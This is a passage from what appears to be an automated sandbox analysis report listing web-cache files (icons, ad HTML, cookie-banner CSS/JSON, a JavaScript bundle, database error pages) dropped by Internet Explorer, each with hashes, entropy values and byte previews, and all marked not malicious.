SSDEEP:	12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
MD5:	84CC977D0EB148166481B01D8418E375
SHA1:	00E2461BCD67D7BA511DB230415000AEFBD30D2D
SHA-256:	BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
SHA-512:	F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\auction[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	17288
Entropy (8bit):	5.78621591794486
Encrypted:	false
SSDEEP:	192:uJb6J4TmRnNERJkMKkcMTmRuZX1lS2TmReptj3krzsyy3V/zJZ84gKOG/Xv3qjm:geXnERJkMv+0lmMpN3krzq/VZfp/f6jm
MD5:	76D08E8723577A159DDF16EC66091C4D
SHA1:	48FD3D196AD0C6CC1ECEC310D3C26227FB42CD7D
SHA-256:	03E65B084BD04740A4C6E270FBFEA229234E9F60A87E9EC03568D9270B52B1EA
SHA-512:	06056D52B6B2A9101BD9A9097B66FA68FAD64A8FC9BAFAB21A41F503EAA265EAD484B3BB89037369889AA8991B3D18CE99BC52A4F1116EA18CFE5C4CE63F09B9
Malicious:	false
Reputation:	unknown
Preview:	..<script id="sam-metadata" type="text/html" data-json="{"optout":{"msaOptOut":false,"browserOptOut":false},"taboola":{"sessionId":"v2_78211769c68358d70edf7cf8295a2785_86d7e73e-9de0-4f81-b6a2-d6a2702c1d7a-tuct8a2df71_1638488561_1638488561_CIi3jgYQr4c_GMb6jZOqzrj6uAEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgFwAA"},"tbsessionid":"v2_78211769c68358d70edf7cf8295a2785_86d7e73e-9de0-4f81-b6a2-d6a2702c1d7a-tuct8a2df71_1638488561_1638488561_CIi3jgYQr4c_GMb6jZOqzrj6uAEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgFwAA","pageViewId":"bdb79e30184546f8a9a4ff8a28bab829","RequestLevelBeaconUrls":[]}">..</script>..<li class="triptych serversidenativead hasimage " data-json="{"tvb":[],"trb":[],"tjb":[],"p":"taboola","e":true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="2" data-viewab

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\cfdbd9[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	740
Entropy (8bit):	7.552939906140702
Encrypted:	false
SSDEEP:	12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
MD5:	FE5E6684967766FF6A8AC57500502910
SHA1:	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
SHA-256:	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
SHA-512:	AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................U....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..\|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\checksync[3].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	204
Entropy (8bit):	4.753212018409155
Encrypted:	false
SSDEEP:	6:ljggS5oc/bLiuggS5oc/bLiuggS5oc/bL7:+DpxgDpxgDp7
MD5:	AA0EC763639C9094D9BE1B0D491AC65A
SHA1:	9A0E137BD9EB21908016360FBB2DAD6AED37CAE4
SHA-256:	4D2671D4C5D04438C3447C787ADF222D33AB22C91222ABB1B5524ED586B42C01
SHA-512:	9A812C4C097D864E757CE84D98542EA239150D61184E2BF1BB62EB9E97F8730ADBB96D00F95B0386FC4B93E82347450ADE2A77E5B495708C0438C7DCF5BCEF81
Malicious:	false
Reputation:	unknown
Preview:	Connection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone away

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\checksync[4].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	204
Entropy (8bit):	4.753212018409155
Encrypted:	false
SSDEEP:	6:ljggS5oc/bLiuggS5oc/bLiuggS5oc/bL7:+DpxgDpxgDp7
MD5:	AA0EC763639C9094D9BE1B0D491AC65A
SHA1:	9A0E137BD9EB21908016360FBB2DAD6AED37CAE4
SHA-256:	4D2671D4C5D04438C3447C787ADF222D33AB22C91222ABB1B5524ED586B42C01
SHA-512:	9A812C4C097D864E757CE84D98542EA239150D61184E2BF1BB62EB9E97F8730ADBB96D00F95B0386FC4B93E82347450ADE2A77E5B495708C0438C7DCF5BCEF81
Malicious:	false
Reputation:	unknown
Preview:	Connection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone away

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\checksync[5].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	204
Entropy (8bit):	4.753212018409155
Encrypted:	false
SSDEEP:	6:ljggS5oc/bLiuggS5oc/bLiuggS5oc/bL7:+DpxgDpxgDp7
MD5:	AA0EC763639C9094D9BE1B0D491AC65A
SHA1:	9A0E137BD9EB21908016360FBB2DAD6AED37CAE4
SHA-256:	4D2671D4C5D04438C3447C787ADF222D33AB22C91222ABB1B5524ED586B42C01
SHA-512:	9A812C4C097D864E757CE84D98542EA239150D61184E2BF1BB62EB9E97F8730ADBB96D00F95B0386FC4B93E82347450ADE2A77E5B495708C0438C7DCF5BCEF81
Malicious:	false
Reputation:	unknown
Preview:	Connection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone away

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\otCommonStyles[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	20953
Entropy (8bit):	5.003252373878778
Encrypted:	false
SSDEEP:	192:LIsia0zYw49vRn4l7cWQjRkmSxoU/4OIZZTg8l9Qonnq3WwHpUkG4HfeXiPcB2jk:HRc7fQxNGoFBlCHcXaivSYBQY2YpuML
MD5:	E4F88E3AF211BD9EA203D23CB0B261D5
SHA1:	6067E95844B3E11A275ADD0B41D7AD3F00A426FD
SHA-256:	E58322F14AC511762E2C74932104D7205440281520CF98E66F15B40AA8E60D05
SHA-512:	B2C8870B61E9132DC7D7167F50F7C85BFE67EAC6DA711BDF0B9C85EB026249A95E8D67FFB0699934EAA304F971E44F0180E8578AFD8353943154FCE689690B76
Malicious:	false
Reputation:	unknown
Preview:	#onetrust-banner-sdk{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}#onetrust-banner-sdk .onetrust-vendors-list-handler{cursor:pointer;color:#1f96db;font-size:inherit;font-weight:bold;text-decoration:none;margin-left:5px}#onetrust-banner-sdk .onetrust-vendors-list-handler:hover{color:#1f96db}#onetrust-banner-sdk:focus{outline:2px solid #000;outline-offset:-2px}#onetrust-banner-sdk a:focus{outline:2px solid #000}#onetrust-banner-sdk #onetrust-accept-btn-handler,#onetrust-banner-sdk #onetrust-reject-all-handler,#onetrust-banner-sdk #onetrust-pc-btn-handler{outline-offset:1px}#onetrust-banner-sdk .ot-close-icon,#onetrust-pc-sdk .ot-close-icon,#ot-sync-ntfy .ot-close-icon{background-image:url("data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHg9IjBweCIgeT0iMHB4IiB3aWR0aD0iMzQ4LjMzM3B4IiBoZWlnaHQ9IjM0OC4zMzNweCIgdmlld0JveD0iMCAwIDM0OC4zMzMgMzQ4LjMzNCIgc3R5bGU9ImVuYWJsZS1iYWNrZ3

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\otFlat[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12859
Entropy (8bit):	5.237784426016011
Encrypted:	false
SSDEEP:	384:Mjuyejbn42OdP85csXfn/BoH6iAHyPtJJAk:M6ye1/m
MD5:	0097436CBD4943F832AB9C81968CB6A0
SHA1:	4734EF2D8D859E6BFF2E4F3F7696BA979135062C
SHA-256:	F330D3AE039F615FF31563E4174AAE9CEAD8E99E00297146143335F65199A7A9
SHA-512:	3CC406AE3430001B8F305FA5C3964F992BA64CE652CCABD69924FE35E69675524E77A9E288DDE9BCF697B9C1C080871076C84399CDFAD491794B8F2642008BE6
Malicious:	false
Reputation:	unknown
Preview:	.. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCI+PGRpdiByb2xlPSJhbGVydGRpYWxvZyIgYXJpYS1kZXNjcmliZWRieT0ib25ldHJ1c3QtcG9saWN5LXRleHQiPjxkaXYgY2xhc3M9Im90LXNkay1jb250YWluZXIiPjxkaXYgY2xhc3M9Im90LXNkay1yb3ciPjxkaXYgaWQ9Im9uZXRydXN0LWdyb3VwLWNvbnRhaW5lciIgY2xhc3M9Im90LXNkay1laWdodCBvdC1zZGstY29sdW1ucyI+PGRpdiBjbGFzcz0iYmFubmVyX2xvZ28iPjwvZGl2PjxkaXYgaWQ9Im9uZXRydXN0LXBvbGljeSI+PGgzIGlkPSJvbmV0cnVzdC1wb2xpY3ktdGl0bGUiPlRpdGxlPC9oMz48cCBpZD0ib25ldHJ1c3QtcG9saWN5LXRleHQiPnRpdGxlPGEgaHJlZj0iIyI+cG9saWN5PC9hPjwvcD48ZGl2IGNsYXNzPSJvdC1kcGQtY29udGFpbmVyIj48aDMgY2xhc3M9Im90LWRwZC10aXRsZSI+V2UgY29sbGVjdCBkYXRhIGluIG9yZGVyIHRvIHByb3ZpZGU6PC9oMz48ZGl2IGNsYXNzPSJvdC1kcGQtY29udGVudCI+PHAgY2xhc3M9Im90LWRwZC1kZXNjIj5kZXNjcmlwdGlvbjwvcD48L2Rpdj48L2Rpdj48L2Rpdj48L2Rpdj48ZGl2IGlkPSJvbmV0cnVzdC1idXR0b24tZ3JvdXAtcGFyZW50IiBjbGFzcz0ib3Qtc2RrLXRocmVlIG90LXNkay1jb2x1bW5zIj48ZGl2IGlkPSJvbmV0cnVzdC1idXR0b24tZ3JvdXAiPjxidXR0b24

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\otPcCenter[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	48633
Entropy (8bit):	5.555948771441324
Encrypted:	false
SSDEEP:	768:VwcBWh5ZSMYib6pWXlzZz6c18tiHoQqhI:VwqZYdZz6c18tySI
MD5:	928BD4F058C3CE1FD20BE50FE74F1CD8
SHA1:	5CBF71DB356E50C3FFCB58E309439ED7EB1B892E
SHA-256:	6048F2D571D6AE8F49E078A449EB84113D399DD5EA69FB5AC9C69241CD7BA945
SHA-512:	1E165855CEF80DDFBE2129FA49A0053055561ADEFF7756DE5EA22338D0770925313CCB0993AD032B95ACE336594A5F38E9EE0F0B58ADFE1552FE9251993391C1
Malicious:	false
Reputation:	unknown
Preview:	.. {.. "name": "otPcCenter",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iIGFyaWEtbW9kYWw9InRydWUiIHJvbGU9ImFsZXJ0ZGlhbG9nIj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGNsYXNzPSJvdC1wYy1oZWFkZXIiPjwhLS0gTG9nbyBUYWcgLS0+PGRpdiBjbGFzcz0ib3QtcGMtbG9nbyIgcm9sZT0iaW1nIiBhcmlhLWxhYmVsPSJDb21wYW55IExvZ28iPjwvZGl2PjxidXR0b24gaWQ9ImNsb3NlLXBjLWJ0bi1oYW5kbGVyIiBjbGFzcz0ib3QtY2xvc2UtaWNvbiIgYXJpYS1sYWJlbD0iQ2xvc2UiPjwvYnV0dG9uPjwvZGl2PjwhLS0gQ2xvc2UgQnV0dG9uIC0tPjxkaXYgaWQ9Im90LXBjLWNvbnRlbnQiIGNsYXNzPSJvdC1wYy1zY3JvbGxiYXIiPjxoMiBpZD0ib3QtcGMtdGl0bGUiPllvdXIgUHJpdmFjeTwvaDI+PGRpdiBpZD0ib3QtcGMtZGVzYyI+PC9kaXY+PGJ1dHRvbiBpZD0iYWNjZXB0LXJlY29tbWVuZGVkLWJ0bi1oYW5kbGVyIj5BbGxvdyBhbGw8L2J1dHRvbj48c2VjdGlvbiBjbGFzcz0ib3Qtc2RrLXJvdyBvdC1jYXQtZ3JwIj48aDMgaWQ9Im90LWNhdGVnb3J5LXRpdGxlIj5NYW5hZ2UgQ29va2llIFByZWZlcmVuY2VzPC9oMz48ZGl2IGNsYXNzPSJvdC1wbGktaGRyIj48c3BhbiBjbGFzcz0ib3QtbGktdGl0bGUiPkNvbnNlbnQ8L3NwYW4+IDxzcGFuIGNsYXNzPSJvdC1saS1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\2d-0e97d4-185735b[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	251398
Entropy (8bit):	5.2940351809352855
Encrypted:	false
SSDEEP:	3072:FaPMULTAHEkm8OUdvUvJZkrqq7pjD4tQH:Fa0ULTAHLOUdvwZkrqq7pjD4tQH
MD5:	24D71CC2CC17F9E0F7167D724347DBA4
SHA1:	4188B4EE11CFDC8EA05E7DA7F475F6A464951E27
SHA-256:	4EF29E187222C5E2960E1E265C87AA7DA7268408C3383CC3274D97127F389B22
SHA-512:	43CF44624EF76F5B83DE10A2FB1C27608A290BC21BF023A1BFDB77B2EBB4964805C8683F82815045668A3ECCF2F16A4D7948C1C5AC526AC71760F50C82AADE2B
Malicious:	false
Reputation:	unknown
Preview:	/! Error: C:/a/_work/1/s/Statics/WebCore.Statics/Css/Modules/ExternalContentModule/Uplevel/Base/externalContentModule.scss(207,3): run-time error CSS1062: Expected semicolon or closing curly-brace, found '@include.multiLineTruncation' /....@charset "UTF-8";div.adcontainer iframe[width='1']{display:none}span.nativead{font-weight:600;font-size:1.1rem;line-height:1.364}div:not(.ip) span.nativead{color:#333}.todaymodule .smalla span.nativead,.todaystripe .smalla span.nativead{bottom:2rem;display:block;position:absolute}.todaymodule .smalla a.nativead .title,.todaystripe .smalla a.nativead .title{max-height:4.7rem}.todaymodule .smalla a.nativead .caption,.todaystripe .smalla a.nativead .caption{padding:0;position:relative;margin-left:11.2rem}.todaymodule .mediuma span.nativead,.todaystripe .mediuma span.nativead{bottom:1.3rem}.ip a.nativead span:not(.title):not(.adslabel),.mip a.nativead span:not(.title):not(.adslabel){display:block;vertical-align:top;color:#a0a0a0}.ip a.nativead .captio

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\52-478955-68ddb2ab[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	dropped
Size (bytes):	396900
Entropy (8bit):	5.314138504283414
Encrypted:	false
SSDEEP:	6144:WXP9M/wSg/5rs1JuKb4KAuPmqqIjHSjasCr1BgxO0DkV4FcjtIuNK:YW/fjqIjHdl16tbcjut
MD5:	635C7C1B8F0A7A5B28EECA13824ABA3C
SHA1:	84340599D2873DCCED885061C40C89DE26228F3A
SHA-256:	C1478CDAFDCA1FC46CF5BC326FD291913C4922D53D97291612F9243626950FBF
SHA-512:	8B65EBEE5CC15558654151B73B5610126A4AF19DF20EE7DD80F0AC3A46089487F846114C3336F9A457D6545A900EC24CDD6B7752E990FAF3A78BF7C269ADBF6F
Malicious:	false
Reputation:	unknown
Preview:	var Perf,globalLeft,Gemini,Telemetry,utils,data,MSANTracker,deferredCanary,g_ashsC,g_hsSetup,canary;window._perfMarker&&window._perfMarker("TimeToJsBundleExecutionStart");define("jqBehavior",["jquery","viewport"],function(n){return function(t,i,r){function u(n){var t=n.length;return t>1?function(){for(var i=0;i<t;i++)n[i]()}:t?n[0]:f}function f(){}if(typeof t!="function")throw"Behavior constructor must be a function";if(i&&typeof i!="object")throw"Defaults must be an object or null";if(r&&typeof r!="object")throw"Exclude must be an object or null";return r=r\|\|{},function(f,e,o){function c(n){n&&(typeof n.setup=="function"&&l.push(n.setup),typeof n.teardown=="function"&&a.push(n.teardown),typeof n.update=="function"&&v.push(n.update))}var h;if(o&&typeof o!="object")throw"Options must be an object or null";var s=n.extend(!0,{},i,o),l=[],a=[],v=[],y=!0;if(r.query){if(typeof f!="string")throw"Selector must be a string";c(t(f,s))}else h=n(f,e),r.each?c(t(h,s)):(y=h.length>0,h.each(function(

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AANuZgF[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	750
Entropy (8bit):	7.653501615166515
Encrypted:	false
SSDEEP:	12:6v/7Wrv0Y7COhH4wY2zKLlJsmUhrpB02KYMYv7LLMVjcS0mNUfozbbj3rtpQd3HO:xrcYOEV3KLXfIB9MYjHMVl0mKozbH3hv
MD5:	93D77F5C5FFACEBA12A1ABFC6190B947
SHA1:	8001474A7342EBF760C66F1C30E48E32E00F2AF3
SHA-256:	E6DA934C90931C6089ADB3D213DDD70C7104D0A182A98AB1C663CEDAE37F83A1
SHA-512:	D5F874DF89D82CC819B7D591766300FC701F0E1FFC6055D4CC4BA55F10674F88EDDA565EB1FA57886AC16A57926EBBBC9A108D45D057D76B904383247CE7EA50
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx..S]HSq...~l.F.af....j..i.(........ ._r...[.!jE.c.....(..\.5.a.X.b.sMj.M.{;....z.....?.......s.--}..$S.._\|..EEA.......$Q...#N;.d2.a.UU.r.".lh...k.2...<..S.$>L..,...`$..../hmr.st+.3Y..(.o..U8.\..G........K...../..q....E...>.EQ..+.j..Y..S.0K... P.%.z....h..=.C.>.`.YD....1."3x......z.1.....$dId.@4U..iG...Q....[c_.kg.h...._~.?6.....u .N....68.j"....Pv..$h....S...!...7..h..C"1.".1.,...>.`....L...sF..<..)...}.X..w....J...n[u...V..g.....E.+N......O..R..Yt<.i.y.j.aOM.N_.A..t.i.4a.._...........z....yR[@-..=.x.:....b'h.jmd..../.........P.B.p9...U...wQ.EJhLpi.XJ.....x..B...;6..HT.S.xz....a.(k....f.#.4z..Z g.q......$Z..@y........B..........IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAPFmi4[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	846
Entropy (8bit):	7.686542726414513
Encrypted:	false
SSDEEP:	12:6v/7cM4j39Et8keaWbqx5608BcA5Anj/HwvwFxobkq4vIkOR3+XOq9zo7pZEz:1MAES35OxE0CAHDFxrEkU0tzo7p2z
MD5:	6F93C3616FBC7B9E97E87E718DF27B14
SHA1:	33F4B22E6C3DC6E9A2BDE8BECC3FC20D2F90A1B3
SHA-256:	DFCE8AE7B7C17FE90C55D7EE093936137DD0528FC4CC5BACDB5ED071FD2E312E
SHA-512:	99599A61F4D2FE8F28F32DDD62239E6FF86A68249A59D5B56AFF1F5D76B41FA841C20890C6BD943078CFBFC807CEDB1711499657866B7C259CC20C55D675D737
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx...]LSg....=-x....!......'.H.).$c].xc.7F.,r.eK.x...hf.[.D..}...%.nj..D...H......@[(.~p.......n..=..o.....G......V..n>J..p.`,....g1m..ZjK@.VHV..Bst.B.1..z5$M.q..q..0.ug.5l.P. K..Cq.\|....k....]l..p..0..[1.4n......z..it..H.0.O...B...,!..[........`.k..d..'..~...7S.X(....&...,.&R..UU...L6s._8....D.=.. 2.7w...9....!...J...<.q....}r...\|.#...GB.....u....u.....b9l......%lb......LGQ..G."a....[..B...sYdM.!.A...7vv.J$x..U.H(9..d.....U\8....N...9....N..U\=9....2SmG......s,&.b.3........7...,..[.......Eb$.=w...x8M:..*z....b.2..8f#.-"....~-."......E.S.Q.....[(.D.........zB...z.^.H_.]U.9h......N^..4f0M.....%.An.xin....4.....7..^[...w'./......:.2nw....L...J.......N5W..5.q.......}..wT........,.R.N;4W:x..e.U...j. ...)/.dj#.d.._.je.x...@."_.@z.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAPwesU[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	777
Entropy (8bit):	7.6388112692970775
Encrypted:	false
SSDEEP:	24:+7lA8BoZmceXqKpNkTxSdmeGt0VLQT2NA2LTBixN:oVoZBn+aFQmFCV8r2L10
MD5:	A89DEB9BD9C12EE39216B4724EF24752
SHA1:	F3410A1069610A57CA068947F1A77F73B9B20FDA
SHA-256:	7438061CAC6A152A15BD67057926404DB423936B22635A1902B0BF54C4B14464
SHA-512:	4065BD6D0C141DF2AB3C4CF0AE2C0D87530363EC2CAFCF47493F8CA69025C8613B2B77065924F49AFE4C810A7D6DDD14DFCB3E69274EC7D167382D24806F70B7
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx.e.{L.q..?.s.]uq.H..)QV.J......56.f.l..iXn..0.[6L.%L.ki.,.)V1b.J.SgrKg....9o....{....~..s..1.z........J.44w1..Y.7;..c>.W..u.O..d..vE.[2.9_....pN.].......J......].D.....Q@g.w.[.q.mC.b..b.,..s.O^~$5..oK3qq.%9&.....{PK...kf..S..d..%.....[....).fSb(!....Q..C.;k.....-.;Ab6E..0...Nb....,.C...A...IG...5.&Q.......5....J.......LC.._.}..VA.....rJ....h..&.LDQP.cA.'..3qsu.d2">r...%1:.PA.k..c8Ak.W^..s ._/-.n=.~#VV#d...\............B.<.{..Q...}.{k..._.E.B,..O.......b6...p......L.........>....m.j?.R..3.OP...g._.f6..?...._N...l..8......r..rhG....i.8%`.@........]...%*\|..........T?.k[u..`/6&.r.P2..k...ZG.._....I+.HX.....d..R..&...9.....be_&...y.\|".z)...lGv..a.....zE.\|..s....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAPwrS4[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	573
Entropy (8bit):	7.438664837450848
Encrypted:	false
SSDEEP:	12:6v/7NzFouDfSmgPEBv2aglxp1ATFlmASPBk3YRRiRHTu9L2p3A5k/1:mpouDft7v9IGpg5k3YRRCxAc
MD5:	BD4DAB976E44AB21C770DE6EBC9F620C
SHA1:	61D80892172A51C39CB605065CD7971D093EFF16
SHA-256:	9EB1FDAB9D3AFBEC190C1BDD7172F14B427BDD0222230302C7C7B7068CF3B39E
SHA-512:	3D24557B9626115E897C191200AEF0F7044FADC33CFC35B30A291A2BA5BF547A33B087E8C14E1BA947B14E48D2D0E3593BF38995140AE2E978845A850A2E9B1B
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx...KkSQ...$..I....R.-VJ..Vp.DG...:.s'......p.D..EPD..VZ...Zl\|..M.p.{R..Y69....k..oT-e..aQ..qj...z.j..H"..$..L.O.6..._....&.N...........e.....Z..@.....D...?....D......@.$lo..+...U......t...N....;.h6...9!.....J....._.eF.;....1P..]X...K0<.%..7..3...Cp.Oe.....H...k.l.A&..(...&.B@.[`e.]9..ba.....0T.?'..Y....V...@....JG:...rAk..n'".Qp_}.j..hV[WD...?...../kA..I.{....G.....%.....B......y....O..j~...E.6wH{.T.AC.y.l. ..'.7...i.....D......'....!p..b...U.?{.....i.c......&.)....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAQby46[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	363
Entropy (8bit):	7.158572738726479
Encrypted:	false
SSDEEP:	6:6v/lhPahmo4mUMeAcyo60p0DbmaEqs2WQ5xTJp8ub7rvz81qBI884CUq109LaP/U:6v/7N/Nqf0m/WqxHfq6IHhUuHU
MD5:	2F9F3CB5388BCD08347366720CE5D288
SHA1:	A39BAC27D57324389B7B65180D231A9030494616
SHA-256:	8E87ACBF78E18EEF07524A2EDB0100BBBF77213CC16227046411F1EEBB6727F4
SHA-512:	FC26F4E0B2B8FDDFEE5657C9425FF0F8C6E2CFF0B8144E3DA597DBA15CA28CE2B10113967B3DE61DD137C6AE384199A03974761A5382FEA93BE250EF9217C2FD
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx..1..@..?........i.."n.s.t....g.:..b...m..^AR..Z..M. l...d.........3........Z%}......Ox..z,.r...1.. ....!.Y.q8..}..p.jb.^s:.(....v.M.E..{..#....L..g0.p..H....p...J.M.m[..Z-.T.-.B...<..Z.l..)b.X0.....j.r.d2....0M.].a....3. ....a....L..76....EN...5T5}.......'..SZdb...g....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AARjTo7[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	19356
Entropy (8bit):	7.948589080765709
Encrypted:	false
SSDEEP:	384:NMaopAB0BYWomk1sj2+Y9+ei8azWV7BVDnVOcvfKuNqs8KmFE5bsDRkeuWTMrX0:NMP+xtNu2V9+rt+dVnVt3KuZ8dG5bsm8
MD5:	FF1D15E36A45BA83633203F3B7E2862A
SHA1:	5008B7735E8052005CE52C52C3DAFF40FAEB8F23
SHA-256:	860A18697195EA174D2B23E29AB5DA22F4B9D10616209F17AEE699E8F705FC3A
